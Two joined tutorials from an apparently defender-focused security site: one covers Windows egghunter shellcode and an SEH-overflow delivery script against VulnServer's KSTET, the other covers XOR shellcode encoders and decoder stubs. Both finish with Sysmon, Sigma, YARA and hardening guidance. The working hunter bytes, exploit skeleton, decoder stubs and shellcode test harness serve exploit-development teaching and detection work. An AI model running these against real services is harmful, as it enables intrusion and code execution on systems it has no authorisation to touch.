An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.

I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.


1. Why Egghunters Exist

The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.

The layout in memory looks like this:

  small overflow buffer (~32-60B)        elsewhere in the process
  +---------------------------+          +-----------------------------+
  | EGGHUNTER (the "hunter")  | --scan-> | w00tw00t + full shellcode   |
  +---------------------------+          +-----------------------------+
                                  finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:

  • At least ~32 reachable bytes to hold the hunter itself.
  • The full payload must already be in memory when the hunter executes.

That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.


2. The Page-Walk Problem

x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.

The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses — it jumps straight to the next page boundary and probes again. Inside a valid page it advances one DWORD at a time looking for the tag.

The brief table of moving parts:

ComponentDetail
Memory iterator registerEDX holds the current scan address
Page-boundary jumpOR DX, 0x0FFF → end of page; INC EDX → start of next page
Validity probeA syscall (or an SEH frame) tests whether the page is readable
Egg comparisonSCASD compares EAX to [EDI] and auto-increments EDI
Transfer to payloadJMP EDI once both halves of the egg match

Flowchart showing the egghunter page-walk loop: snapping EDX to page boundaries with OR DX 0x0FFF, probing validity via INT 0x2E, skipping on access violation, scanning with SCASD, and jumping to payload on egg match.
The egghunter skips entire 4 KB pages on access violations rather than crawling byte-by-byte, keeping scan time tractable across the full virtual address space.

3. Anatomy of the Syscall Egghunter

The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.

; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
    or   dx, 0x0fff        ; EDX -> last byte of current 4KB page
loop_inc_one:
    inc  edx               ; advance one byte (rolls into next page)
loop_check:
    push edx               ; save scan pointer (clobbered by syscall)
    push 0x2               ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
    pop  eax               ;   -> EAX = 0x2   *** verify per OS, see j00ru ***
    int  0x2e              ; legacy syscall gate
    cmp  al, 0x05          ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
    pop  edx               ; restore scan pointer
    je   loop_inc_page     ; bad page -> skip to next page boundary
is_egg:
    mov  eax, 0x74303077   ; "w00t"
    mov  edi, edx          ; EDI = current address
    scasd                  ; compare [EDI] to EAX, EDI += 4
    jnz  loop_inc_one      ; first half mismatch -> keep scanning
    scasd                  ; compare the *second* half of the egg
    jnz  loop_inc_one
matched:
    jmp  edi               ; EDI now points just past the doubled tag

Two SCASD instructions back to back are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg — exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically — only the syscall number differs.

IdentifierValue / Note
SyscallNtAccessCheckAndAuditAlarm
Syscall number (x86 XP–7)0x02
InvocationINT 0x2E
Access-violation status0xC0000005CMP AL, 0x05
Invalid-page actionJE loop_inc_page
Size~32 bytes

Syscall numbers are OS-version specific. 0x02 is stable on XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s table at j00ru.vexillium.org/syscalls/nt/64/ for your exact target build.


4. The SEH-Based Variant

Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.

; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
    push handler            ; EXCEPTION_REGISTRATION_RECORD.Handler
    push dword [fs:0]        ; .Next = current head of the SEH chain
    mov  [fs:0], esp         ; install our frame as the new chain head

    xor  edx, edx            ; scan pointer
scan_loop:
    inc  edx
    mov  edi, edx
    mov  eax, 0x74303077     ; "w00t"
    scasd                    ; read [EDI]; faults route into 'handler'
    jnz  scan_loop
    scasd                    ; confirm second half of the egg
    jnz  scan_loop
    pop  dword [fs:0]        ; restore previous SEH frame
    add  esp, 4
    jmp  edi                 ; transfer to payload
handler:                     ; entered on STATUS_ACCESS_VIOLATION
    ; bump saved EDX in the CONTEXT past the bad page,
    ; return ExceptionContinueExecution, resume scan_loop
    ret
FeatureSyscall variantSEH variant
Size~32 bytes~60 bytes
Validity checkINT 0x2ENtAccessCheckAndAuditAlarmCustom FS:[0] handler
OS portabilityFragile (syscall # changes)More portable
Detection surfaceINT 0x2E is glaringQuieter, but installs an SEH frame

That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.


Hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability.
The syscall hunter wins on size but loses on portability; the SEH hunter avoids hardcoded syscall numbers at the cost of roughly double the byte footprint and its own SEH-frame detection surface.

5. Egg Tags and Bad Characters

The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.

First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters\x00, \x0A, \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.

Second, and easy to forget: the tag must be unique in process memory ahead of the payload. If the 4-byte value appears anywhere before your real payload — including elsewhere in your own crafted buffer — the hunter may jump there first and execute garbage. Scan your buffer before sending:

def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
    payload_at = buffer.find(tag * 2)     # the real, doubled egg
    earlier    = buffer.find(tag)          # any earlier single hit?
    if earlier != -1 and earlier < payload_at:
        print(f"[!] tag {tag!r} appears at offset {earlier} "
              f"before the payload at {payload_at}")
        return False
    return True

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.

# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256))           # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10

Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.

The CS segment selector reveals the mode — 0x23 for 32-bit, 0x33 for 64-bit. The hunter checks it, then far-calls through FS:[0xC0] to cross into 64-bit code.

; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov  ebx, cs            ; read code-segment selector
    cmp  bl, 0x23           ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov  bl, 0xc0
    call dword [fs:ebx]     ; far call via FS:[0xC0] -> 64-bit mode
    cmp  al, 0x05           ; STATUS_ACCESS_VIOLATION low byte
    je   loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly — verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.


7. Wiring It Into an SEH Overflow

A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.

[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
   ... and the egg-tagged full payload lives in a SEPARATE field/request ...
#!/usr/bin/env python3
# LAB ONLY — staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket
RHOST, RPORT = "192.168.56.20", 9999

egghunter = (                       # 32-byte syscall hunter, tag "w00t"
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90"           # jmp +6 over the SEH record
seh  = b"\x42\x42\x42\x42"           # PLACEHOLDER pop/pop/ret (find per target)
egg  = b"w00tw00t"                   # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

trigger  = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))

with socket.create_connection((RHOST, RPORT)) as s:
    s.recv(1024)
    s.send(b"KSTET " + payload + b"\r\n")   # 1) stage the egg-tagged payload first
    s.send(b"KSTET " + trigger + b"\r\n")   # 2) THEN trigger overflow + run hunter
Flow diagram of a staged SEH overflow layout showing padding leading to nSEH short jump, SEH POP-POP-RET gadget, the egghunter in the constrained overflow buffer, and the egg-tagged full payload delivered separately in another request field.
The egg-tagged payload must arrive in a separate request before the overflow trigger is sent — reversing the order leaves the hunter scanning endlessly with nothing to find.

Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.


8. Lab: VulnServer KSTET

VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:

  1. Attach VulnServer in Immunity Debugger or x64dbg.
  2. Fuzz KSTET, find the offset to SEH control with a cyclic pattern.
  3. Locate a clean POP/POP/RET in a non-/SAFESEH, non-ASLR module.
  4. Generate the hunter with mona: !mona egg -t w00t (add -c to encode out bad chars). Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.
  5. Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg — this is the moment that makes the mechanism click.

Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.


9. Detecting Egghunter Behavior

The hunter is loud if you’re listening. Two behavioral tells lead:

  • A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
  • NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.
Event IDNameRelevance
1Process CreationBaseline parent-child chain for the vulnerable service
8CreateRemoteThreadEgg payload injecting; StartModule/StartFunction empty when the start address is outside loaded modules — a shellcode tell
10ProcessAccessCross-process handles requesting PROCESS_VM_WRITE (0x0020), PROCESS_VM_OPERATION (0x0008), PROCESS_CREATE_THREAD (0x0002)
25ProcessTamperingSysmon 13+; in-memory image diverging from disk — hallmark of in-memory execution

Default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of kernel32.dll exclusions — tune it before you rely on Event ID 8.

title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader
status: experimental
logsource:
  product: windows
  category: create_remote_thread     # Sysmon Event ID 8
detection:
  selection:
    StartModule: ''
    StartFunction: ''
  condition: selection
level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688 with command lines. And flag INT 0x2E in user mode wherever EDR or ETW lets you — it’s about as high-fidelity as indicators get.

YARA pins the syscall hunter’s opcode signature for memory forensics:

rule Egghunter_Syscall_x86 {
    meta:
        description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
        author = "GenXCyber"
    strings:
        $page_walk = { 66 81 CA FF 0F }   // or dx, 0x0fff
        $syscall   = { CD 2E }            // int 0x2e
        $av_check  = { 3C 05 }            // cmp al, 0x05
        $scasd     = { AF }               // scasd
    condition:
        all of them and (@syscall - @page_walk) < 32
}

10. Tools for Egghunter Analysis

ToolDescriptionLink
mona.pyGenerates/verifies egghunters (!mona egg) in Immunitycorelan.be
Immunity DebuggerClassic exploit-dev debugger, mona hostimmunityinc.com
x64dbgFree user-mode debugger for stepping the scanx64dbg.com
VulnServerSafe, intentionally vulnerable practice targetgithub.com
Process HackerSpot the 100% CPU thread and handle accessprocesshacker.sourceforge.io
SysmonEID 8/10/25 telemetry for shellcode behaviormicrosoft.com
j00ru syscall tableAuthoritative per-OS syscall numbersj00ru.vexillium.org
osed-scripts (epi052)Egghunter generator and OSED helpersgithub.com

11. Mitigations and Modern Reality

Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.

MitigationEffect on the technique
DEP / NXPayload on stack/heap won’t execute; primary kill switch for legacy targets
ASLRHardcoded POP/POP/RET addresses break; forces wider scans → more CPU and ETW noise
Control Flow GuardValidates indirect targets; disrupts the final JMP EDI when enforced
GS / stack canariesDon’t stop the hunter, but can stop the overflow that delivers it
App sandboxingLimits post-execution blast radius

The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.


12. MITRE ATT&CK Mapping

Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Service crash/recover, EID 1 anomalies
Process InjectionT1055Sysmon EID 8/10, TI ETW
Process Injection: DLL InjectionT1055.001EID 8 with empty StartModule
Reflective Code LoadingT1620In-memory PE, EID 25 ProcessTampering
Obfuscated Files or InformationT1027Encoded egg payload, YARA on decoder stubs
Sandbox Evasion: Time BasedT1497.003CPU-spike artifact in sandboxes

Summary

  • An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
  • The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm/INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
  • The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core — a behavioral indicator in its own right.
  • Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
  • Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window — and mitigate upstream with DEP, ASLR, and CFG.

Related Tutorials

References

Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.


1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

ByteNameWhy it breaks things
\x00NULLTerminates C strings; strcpy/sprintf stop copying here
\x0aLine FeedRead as end-of-input by line-oriented protocols and gets
\x0dCarriage ReturnPaired with \x0a in HTTP/SMTP headers; often stripped
\x20SpaceToken delimiter in many parsers
\xff0xFFSentinel / length markers in some binary protocols

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).


2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A
AKA ⊕ K
000
011
101
110

There’s no key schedule, no S-box, no state to carry — which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in well under 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.

The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.


Flow diagram showing shellcode going through key search and XOR encoding, crossing a hostile transport layer, then being decoded by the stub and executed on the target
XOR encoding and decoding are symmetric operations — the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

  1. Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
  2. Drop it into the vulnerable buffer and dump the buffer from memory.
  3. Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
  4. Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(expected) != len(received):
        return min(len(expected), len(received)), "(truncated)", None
    return None

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the byte right before where the copy stopped is usually the terminator. Note it, exclude it, run again.


4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.


5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len silently truncates anything over 255 bytes, so a 300-byte payload decodes only its first 44 bytes and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, use the full mov ecx, payload_len and clear ECX with xor ecx, ecx first.

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:

/* LAB ONLY — disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */

#include <stdio.h>
unsigned char buf[] =
    "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
    "\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}
Flow diagram of the JMP-CALL-POP technique showing how a forward JMP reaches a CALL that pushes the payload address, POP captures it into ESI, and the decode loop XORs each byte before jumping into the now-decoded shellcode
JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax\x29\xc0, which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.


7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
decode_chunk:
    mov   al, [esi]            ; AL = key for this chunk
    inc   esi                  ; ESI -> first data byte
    xor   byte [esi], al       ; decode data byte 0
    inc   esi
    xor   byte [esi], al       ; decode data byte 1
    inc   esi
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; first decoded byte
SchemeProCon
Fixed single keySmallest stub; one xor per byteFails when bad-char set is dense
Per-chunk keySurvives tight bad-char setsLarger blob (one key byte per chunk); bigger stub

The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.


8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
    sub   esp, 0x200           ; reserve 512 bytes of scratch
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest — you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).


9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

  • Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
  • Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like fstenv [esp-0xc] to recover EIP without a tell-tale CALL — a deliberate jab at emulators that don’t model the FPU.

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.


10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

BehaviorWhat it reveals
Tight xor/inc/loop over a code regionClassic fixed-key decoder stub
Region transitions writable → executableDecoded payload about to run
Execution from unbacked memoryCode with no file on disk behind it

Sysmon Event IDs

Event IDNameRelevance
1Process CreationLoader/injector process spawn
7Image LoadedDLLs from temp/download paths into system processes
8CreateRemoteThreadThread created in another process — low-volume, high-signal
10ProcessAccessCross-process memory access; inspect GrantedAccess and CallTrace
25ProcessTamperingIn-memory image diverges from disk (hollowing / in-memory decode)

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.

ETW providers

ProviderPurpose
Microsoft-Windows-Threat-IntelligenceKernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs
Microsoft-Windows-Security-AuditingEvent ID 4688 process creation with command line
AMSIInspects script content after deobfuscation, before execution

Hardening

  • bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
  • Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
  • Code Integrity Guard (CIG) via ProcessSignaturePolicy — blocks unsigned image loads.
  • Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
  • Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

Hierarchy diagram showing behavioral indicators branching into RWX self-modifying memory and unbacked execution, each feeding into corresponding telemetry sources and hardening controls
Defenders shift focus from ever-changing encoded bytes to stable behavioral signals — self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

ToolDescriptionLink
NASMAssemble x86/x64 decoder stubsnasm.us
GDB + pwndbgSingle-step the decode loop, inspect ESI/ECXgdb.gnu.org
objdump / objcopyDisassemble stubs, extract .text bytesgnu.org
CapstoneProgrammatic opcode audit for bad charscapstone-engine.org
pwntoolsEncoder/exploit automation (pwnlib.encoders)docs.pwntools.com
pe-sieve / MonetaScan live processes for RWX / unbacked memorygithub.com
SysmonEndpoint telemetry for Event IDs 8, 10, 25learn.microsoft.com

12. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Obfuscated Files or InformationT1027Entropy/structure anomalies; encoded blob with decoder prefix
Encrypted/Encoded FileT1027.013Static scan for XOR-loop stub patterns near high-entropy data
Deobfuscate/Decode Files or InformationT1140Self-modifying memory; ACG violations; ETW VirtualProtect
Process InjectionT1055Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN
PE InjectionT1055.002Shellcode written into another process; RWX region creation
Reflective Code LoadingT1620Execution from unbacked memory; pe-sieve / Moneta

Summary

  • XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
  • The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
  • The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
  • Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
